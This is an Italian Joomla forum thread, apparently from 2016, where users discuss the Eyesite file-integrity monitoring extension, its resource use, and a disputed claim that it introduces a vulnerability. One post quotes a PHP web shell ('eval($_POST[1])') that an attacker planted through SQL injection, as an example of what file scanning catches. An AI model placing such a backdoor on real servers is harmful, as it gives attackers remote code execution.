Autore Topic: Attacchi informatici, monitoriamo il nostro sito con Eyesite  (Letto 4825 volte)

Offline adottauncane

  • Team Joomla.it
  • Fuori controllo
  • *******
  • Post: 18155
  • Sesso: Femmina
    • Mostra profilo
    • Adotta un cane
Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
« Risposta #20 il: 13 Ott 2016, 12:00:13 »
E questo componente non le ha?

Offline giusebos

  • Fuori controllo
  • *
  • Post: 19628
  • Sesso: Maschio
  • Giuseppe Serbelloni Mazzanti Viendalmare
    • Mostra profilo
    • Demo iCagenda
Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
« Risposta #21 il: 13 Ott 2016, 12:05:40 »
Io attraverso questo componente sono riuscito a scovare 5 file modificati in un sito dove mi appariva della pubblicità, piccole stringhe inserite parte nei file core e parte in una estensione che elaboravano l'inserimento di questi banner ads non voluti.

Gli haker avevano fatto questo in un periodo dove c'era un susseguirsi di versioni buggate per un motivo o per un  altro, sia per il componente che per joomla, ma il bello è che l'attivazione della pubblicità c'è stata molto tempo dopo, confondendomi non poco in quanto tutto aggiornato.

Ci sono pro e contro, questo controllo dei file, md5 checksum, prende risorse, però ti aiuta moltissimo a capire se un file è modificato oppure.

Magari è da usare in ambito di ripristino...

Ma se pensate di controllare tutti gli overrade nella cartella HTML del template, nessun software potra farlo, li ognuno di noi a personalizzato a modo proprio i file, i vari sviluppatori di template anche.....

Però che un conto è verificare una ventina o anche il doppio di file contenuti dentro html, ed una cosa è verificare tutto il sito.

Aggiungo anche che adesso con la versione 3.6.2 possiamo sovrascrivere i file del core abbastanza agevolmente, eliminando qualsiasi dubbio di file core modificati, forse un sistema automatico di reinstallazione delle estensioni potrebbe farci raggiungere ad una sicurezza pari al 99,5% sull'integrità dei file?

su www.icagenda.it guide e tutorial con esempi di chronoforms e chronoconnectivity

Offline Alex21

  • Appassionato
  • ***
  • Post: 644
    • Mostra profilo
    • servizi web
Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
« Risposta #22 il: 13 Ott 2016, 12:31:23 »
Va benissimo, è quello che si fa quando si scrive un articolo, e naturalmente ti ringrazio.
Solo resto con il dubbio (leggendo i post di MariaElenaBoschi io non ne capisco una cippa, tutto quello che faccio per la sicurezza è un backup e gli aggiornamenti) che magari il gioco non valga la candela...
È questo che mi interesserebbe capire.

Se qualcuno ha altre opinioni in merito...
Buongiorno Adottauncane, il mio è un ex trovatello che ormai ha già una certa età, poveretto.
Mi sembra logico che sia necessario fare dei backups periodici ma è anche importante eseguire regolarmente la scansione di tutti i file del sito, così da rendersi conto se ce ne sono di sospetti.
Ad esempio l'ultima anima pia - peraltro assolutamente nostrana a giudicare dal suo ip - è riuscita (con sql injection) ad inserire una cosa così:
/webconfig.txt.php   conteneva:
<?php eval($_POST[1]);?>

Il file alterato era nella radice, facile da trovare, ma poteva essere annidato chissà dove.
Non conosco lo specifico componente joomla ma dai risultati esegue un backup di tutto, con la differenza che invece di impacchettare i file dentro uno .zip si limita ad evidenziare la data di creazione o delle ultime modifiche.


Ciao!


Offline MariaElenaBoschi

  • Appassionato
  • ***
  • Post: 469
    • Mostra profilo
Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
« Risposta #23 il: 13 Ott 2016, 13:16:36 »
Ho risposto ai tuoi post citando i testi di Battisti (è un caso, non è nemmeno uno dei miei artisti preferiti, anzi) perchè nella mia non più breve vita posso, con orgoglio, dire di avere imparato una sola cosa importante: non esistono cose giuste o sbagliate, esiste il modo giusto o sbagliato di dirle.

no no esistono le cose sbagliate, un'estensione per la sicurezza che introduce vulnerabilità non è un astrazione è una cosa sbagliata che tu promuovi

Dalle risposte a questo post, ma anche da altri interventi in questo forum, io percepisco che tu fai la gara a chi ce l'ha più lungo

e l'ho vinta ;)
mancano 2 giorni alla mia prematura dipartita, saluti a tutti, meb.

Offline marine

  • Team Joomla.it
  • Instancabile
  • *******
  • Post: 5007
  • Sesso: Maschio
    • Mostra profilo

Offline Pietro Tedde

  • Nuovo arrivato
  • *
  • Post: 13
    • Mostra profilo
Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
« Risposta #25 il: 13 Ott 2016, 15:09:38 »
A me questo sembra un ottimo mezzo, l'unico problema che ho riscontrato è una sorta di incompatibilità tra questo e akeeba.
Infatti, ogni volta che tento di creare un backup, si interrompe al 73% su alcuni siti, su altri mi da un errore a completamento dello stesso.. Utile, ma non posso usarlo ovunque.
« Ultima modifica: 13 Ott 2016, 16:52:51 da Pietro Tedde »

Online jeckodevelopment

  • Administrator
  • Instancabile
  • *****
  • Post: 5648
  • Sesso: Maschio
    • Mostra profilo
    • Jecko Development
Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
« Risposta #26 il: 13 Ott 2016, 18:50:32 »
e il Ministro ti ha anche detto perché si blocca...
ad ogni modo, sconsiglio caldamente di installare un'estensione come questa che introduce una vulnerabilità (il mancato filtro).

Meglio AdminTools.

Offline giusebos

  • Fuori controllo
  • *
  • Post: 19628
  • Sesso: Maschio
  • Giuseppe Serbelloni Mazzanti Viendalmare
    • Mostra profilo
    • Demo iCagenda
Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
« Risposta #27 il: 13 Ott 2016, 18:56:59 »
ma con admintools come si fa, gli detti un occhiata ma non ci capii niente.
su www.icagenda.it guide e tutorial con esempi di chronoforms e chronoconnectivity

Offline MariaElenaBoschi

  • Appassionato
  • ***
  • Post: 469
    • Mostra profilo
Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
« Risposta #28 il: 13 Ott 2016, 20:18:38 »
e il Ministro ti ha anche detto perché si blocca...
ad ogni modo, sconsiglio caldamente di installare un'estensione come questa che introduce una vulnerabilità (il mancato filtro).

Meglio AdminTools.

il problema delle risorse consumate esiste perchè l'ho provato. Avevo trovato anche che un parziale rimedio era usare le classi di php tipo DIRECTORY_ITERATOR.

Quella della vulnerabilità io non lo so, ho chiesto di verificare se esisteva quel file e se era scritto così. Se sì allora è una vulnerabilità se no allora può darsi abbia io in mano un file di una versione vecchia... cioè non è che mi sono sbattuto più di tanto ;)
mancano 2 giorni alla mia prematura dipartita, saluti a tutti, meb.

Offline marine

  • Team Joomla.it
  • Instancabile
  • *******
  • Post: 5007
  • Sesso: Maschio
    • Mostra profilo
Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
« Risposta #29 il: 14 Ott 2016, 11:45:41 »
un'estensione per la sicurezza che introduce vulnerabilità non è un astrazione è una cosa

Quella della vulnerabilità io non lo so, ho chiesto di verificare se esisteva quel file e se era scritto così. Se sì allora è una vulnerabilità se no allora può darsi abbia io in mano un file di una versione vecchia... cioè non è che mi sono sbattuto più di tanto ;)

@ElenaMariaBoschi

Cioè, fammi capire, hai screditato il lavoro di una persona (lo sviluppatore dell'estensione), affermando pubblicamente che il componente introduce una vulnerabilità e poi retifichi con "cioè non è che mi sono sbattuto più di tanto (faccetta che ammicca)".

@tutti
Lo sviluppatore, contattato via mail, conferma che il codice che ElenaMariaBoschi ha postato è di una vecchia versione e che la versione attuale non ha nessuna falla di sicurezza al momento conosciuta.

@ElenaMariaBoschi

e l'ho vinta ;)

Si, hai vinto.

 

Host

Torna su